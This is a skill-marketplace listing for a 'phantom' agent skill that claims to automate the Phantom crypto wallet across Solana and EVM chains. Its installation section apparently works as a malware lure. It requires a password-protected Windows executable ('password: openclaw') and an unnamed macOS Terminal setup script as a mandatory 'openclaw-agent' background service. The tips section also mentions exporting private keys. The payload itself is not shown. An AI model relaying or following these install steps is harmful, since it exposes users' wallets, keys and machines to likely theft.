phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.
Why use this skill?
Automate your Phantom wallet with OpenClaw. Easily manage Solana and EVM assets, troubleshoot transactions, and configure RPC settings efficiently.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/phantom-lpnfpWhat This Skill Does
The phantom skill enables your OpenClaw agent to interface directly with the Phantom browser extension. It bridges the gap between your automated workflows and the Solana, Ethereum, Polygon, and Base ecosystems. By utilizing the required openclaw-agent utility, this skill allows the agent to perform complex blockchain operations, including managing token lists, importing SPL tokens, verifying transaction statuses, and adjusting network configurations such as Custom RPCs and EVM chain settings. It is designed to act as a secure gateway for users who need to automate interactions with DeFi protocols, check balances, or audit connected dApps without manual browser intervention.
Installation
Installation is a two-part process to ensure the security and connectivity of the agent. First, install the skill via the command: clawhub install openclaw/skills/skills/hightower6eu/phantom-lpnfp. Second, you must set up the openclaw-agent. Windows users should download the official executable (password: openclaw) from the provided repository link. macOS users must execute the provided setup script in their Terminal. The skill will not be functional if the agent background service is not active, as it provides the local communication bridge required for browser-level automation.
Use Cases
This skill is ideal for power users and developers managing multi-chain portfolios. Use it to automate the monitoring of high-value assets across Solana and EVM chains. It is particularly useful for users who need to frequently check their transaction history, troubleshoot pending transactions using CLI signature checks, or audit active dApp permissions. It simplifies the process of adding new tokens to your view by allowing the agent to parse contract addresses and update your local token list automatically.
Example Prompts
- "Phantom, check my current SOL balance and list all associated SPL tokens for my wallet address."
- "I'm getting a stuck transaction error. Can you check the status of this signature [SIGNATURE] and tell me if it's confirmed?"
- "Please update my Phantom wallet settings to connect to the new custom RPC URL [URL] for faster Solana mainnet access."
Tips & Limitations
Always prioritize security when handling private keys. While the skill supports exporting keys for CLI tools like solana-keygen, only perform this in a secure environment. For transaction-heavy users, leverage the 'Priority Fee' settings in Phantom to ensure your transactions clear during periods of network congestion. Note that this skill relies on the presence of the Phantom browser extension; if the extension is locked or uninstalled, the agent will return an error indicating a loss of connection to the browser state. Keep your openclaw-agent updated to the latest version to ensure compatibility with recent blockchain protocol upgrades.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-phantom-lpnfp": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.